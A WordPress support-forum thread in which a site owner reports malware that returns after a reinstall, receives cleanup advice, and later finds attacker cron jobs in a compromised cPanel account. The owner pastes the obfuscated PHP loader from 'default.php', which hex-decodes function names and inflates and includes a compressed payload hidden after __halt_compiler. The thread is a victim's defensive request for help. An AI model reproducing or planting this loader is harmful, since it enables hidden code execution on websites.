Malware recreates itself even after deleting and reinstalling wordpress

  • I have an issue with a wordpress website facing malware attack. I have tried clearing and removing the site malware in all several ways but this one seems so compromised that I had to backup and delete the whole site files and database then reinstall a fresh copy of wordpress into that site. I left it for like 5mins and AGAIN!!! the malware files were created into this freshly installed site. Could you please tell me what is going on with this site and where else could this be coming from. I’m just confused already. Haven’t faced such issue before.

    • This topic was modified 1 year, 4 months ago by spottykay.

    The page I need help with: [log in to see the link]

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Support wfpeter

    (@wfpeter)

    Hi @spottykay, sorry to hear you’re being affected like this.

    It’s possible that if the reinstall of WordPress uses a new admin account/password and new database name with a different prefix/user/password, another attack vector could be possible. Insecure/exposed hosting, cPanel or database admin accounts could be possibilities, but I can only speculate.

    As a rule, any time I think someone’s site has been compromised I also tell them to update their passwords for their hosting control panel, FTP,  WordPress admin users, and database. Make sure to do this.

    I will provide our site cleaning instructions for you below even though you’ve already gone some way to dealing with this, just in case any steps you haven’t tried can help: https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    XML-RPC requests are one of the most common brute force/credential stuffing attack methods so we always recommend using long unique passwords along with 2FA for your administrative accounts.

    Additionally you might find the WordPress Malware Removal section in our free Learning Center helpful.  

    If you are unable to fully clean this on your own there are paid services that will do it for you. Wordfence offers one and there are others. Regardless if you choose to clean it yourself or let someone else do so, we recommend that you make a full backup of the site beforehand.

    Thanks,
    Peter.

    Thread Starter spottykay

    (@spottykay)

    Thanks Peter,
    here’s the code from a file that always recreates once the malware kickstarts operation in the file.

    ????<?php $s = "he" . "x2bin";$_ = array($s,"666f70656e","667365656b","746d7066696c65","73747265616d5f6765745f6d6574615f64617461",
"667772697465","73747265616d5f6765745f636f6e74656e7473","66636c6f7365","5f5f68616c745f636f6d70696c6572","677a696e666c617465");
$x1=$_[0];$x2=$x1($_[1]);$x3=$x1($_[2]);$x4=$x1($_[3]);$x5=$x1($_[4]);$x6=$x1($_[5]);$x7=$x1($_[6]);$x8=$x1($_[7]);$x9=$x1($_[8]);
$x10=$x1($_[9]);$f=$x2(__FILE__,"r");$x3($f,__COMPILER_HALT_OFFSET__);$t=$x4();$u=$x5($t);$u=$u["uri"];$x6($t,$x10($x7($f)));
IncLude($u);$x8($t);__Halt_CompiLer/** */();??/?(??J+?K.???S(N-*K-??T????TIQ?UP?w????t?
h

    The file name is default.php. I’m sending it if you could have any idea about it comes from or what kind it is. Wordfence gives me a report about something like x2bin….

    Thread Starter spottykay

    (@spottykay)

    I’ve found the solution. The hosting account was compromised and the hacker created Cronjobs. I deleted them from the cpanel and changed the cpanel account password.

    Hope this helps anyone facing the same issue.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Malware recreates itself even after deleting and reinstalling wordpress’ is closed to new replies.